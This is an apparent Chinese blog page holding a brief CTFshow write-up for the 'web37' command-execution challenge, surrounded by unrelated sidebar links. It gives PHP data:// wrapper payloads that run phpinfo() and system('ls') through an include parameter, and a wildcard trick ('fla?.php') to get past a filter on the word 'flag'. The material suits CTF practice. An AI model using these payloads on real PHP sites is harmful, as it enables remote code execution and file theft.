当前位置:网站首页>CTFshow,命令执行:web37
CTFshow,命令执行:web37
2022-08-01 09:48:00 【Part 02】
php 伪协议由于读取 flag.php
flag 已被过滤
使用 data 协议
?c=data://text/plain,<?php phpinfo();?>
?c=data://text/plain,<?php system('ls');?>
cat fla?.php 即可
边栏推荐
- ACmix 论文精读,并解析其模型结构
- Meeting OA (Upcoming Meetings & All Meetings)
- mysql login in cmd and basic operations of database and table
- SkiaSharp's WPF self-painted five-ring bouncing ball (case version)
- Redis中间件(从搭建到弃坑)
- [Beyond programming] When the fig leaf is lifted, when people begin to accept everything
- 报告:想学AI的学生数量已涨200%,老师都不够用了
- leetcode 42. Catch the rain
- SQL Server database schema and objects related knowledge notes
- ogg同步oracle到mysql,字段里面可能有需要转义的字符,怎么配置转义?
猜你喜欢
C language game - minesweeper
rpm and yum
WLAN networking experiment of AC and thin AP
network basic learning
shell脚本------条件测试 if语句和case分支语句
Enterprise WeChat group: robot timing reminder function database configuration
基于MySql,Redis,Mq,ES的高可用方案解析
Redis middleware (from building to refuse pit)
ACmix 论文精读,并解析其模型结构
Meeting OA (Upcoming Meetings & All Meetings)
随机推荐
获取页面数据的方法
AC与瘦AP的WLAN组网实验
scrapy爬虫框架的使用
HoloView -- Tabular Datasets
CTO强烈禁止使用Calendar,那用啥?
基于CAP组件实现补偿事务与消息幂等性
高级驾驶辅助系统ADAS简介
解析MySQL数据库:“SQL优化”与“索引优化”
[Software Architecture Mode] The difference between MVVM mode and MVC mode
ogg同步oracle到mysql,字段里面可能有需要转义的字符,怎么配置转义?
How programmers learn open source projects, this article tells you
opencv创建窗口—cv.namedWindow()
常见的API安全缺陷有哪些?
redis
InputStream转成String
SkiaSharp's WPF self-painted five-ring bouncing ball (case version)
Idea common plugins
sql server, FULL模式, dbcc shrinkfile(2,1) 不能收缩事务日志,还是原来的大小,是为什么?
【Untitled】
AI篮球裁判火了,走步算得特别准,就问哈登慌不慌